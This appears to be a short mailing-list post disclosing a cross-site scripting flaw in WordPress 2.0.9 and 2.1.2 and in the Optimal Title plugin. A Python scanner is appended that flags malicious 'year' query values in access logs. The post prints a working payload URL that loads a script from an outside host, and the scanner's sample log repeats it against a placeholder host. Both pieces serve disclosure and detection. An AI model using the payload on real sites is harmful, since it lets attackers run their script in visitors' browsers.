Hi,

a few days ago someone told me that a lot of WordPress blogs are vulnerable to XSS injections. And he showed me a demo:

<www.your-domain.tld/index.php?year=%22%3E%3C/title%3E%3Cscript%20src=http://h4k.in/j.js%3E%3C/script%3E>

This works in WP 2.0.9 and 2.1.2. I tested it in a few weblogs.

The new updates in 2.0.10 and 2.1.3 fix this, BUT not if you are using the plugin Optimal Title (http://elasticdog.com/2004/09/optimal-title/). The security hole is then still there, also in WP 2.0.10 and 2.1.12. I also tested this in a few weblogs.

I don't know how serious this problem is because I'm not a security expert ... and also not a native English speaker :-) but that is another story.

Greetings
--
Vladimir Simovic
Website: www.vlad-design.de | Weblog: www.perun.net
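A defender-side check for the request pattern reported above, as an added example that is not part of the original post: it scans web access log lines for `year` query values that are not plain numbers. The combined log format, the "up to four digits" rule and the sample lines (with a placeholder script host) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate year archive value is a number of up to four digits.
YEAR_RE = re.compile(r"\d{1,4}")
# Characters needed to close the <title> element or an attribute.
MARKUP_CHARS = set("<>\"'")

def check_year_param(target):
    """Return None if `year` is absent or numeric, else a finding dict."""
    query = urlsplit(target).query
    # parse_qs percent-decodes, so %3Cscript%3E is inspected as <script>.
    for value in parse_qs(query, keep_blank_values=True).get("year", []):
        if YEAR_RE.fullmatch(value):
            continue
        return {"value": value,
                "markup": any(ch in MARKUP_CHARS for ch in value)}
    return None

def scan(lines):
    """Return (line number, finding) for every log line with a bad `year`."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        finding = check_year_param(match.group(1))
        if finding:
            findings.append((lineno, finding))
    return findings

# Constructed sample log lines (addresses, dates and script host are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2007:10:00:01 +0200] "GET /index.php?year=2007 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [10/Apr/2007:10:00:05 +0200] "GET /index.php?year=%22%3E%3C/title'
    '%3E%3Cscript%20src=http://example.invalid/j.js%3E%3C/script%3E HTTP/1.1" 200 5230',
    '192.0.2.12 - - [10/Apr/2007:10:00:09 +0200] "GET /index.php?year=2007abc HTTP/1.1" 200 5100',
    '192.0.2.13 - - [10/Apr/2007:10:00:12 +0200] "GET /?p=12 HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for lineno, finding in scan(SAMPLE_LOG):
        print(lineno, finding)
```

A hit with `markup` set to true only shows that such a request was received; whether the value was echoed unescaped depends on the WordPress version and plugins in use, as the post describes.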
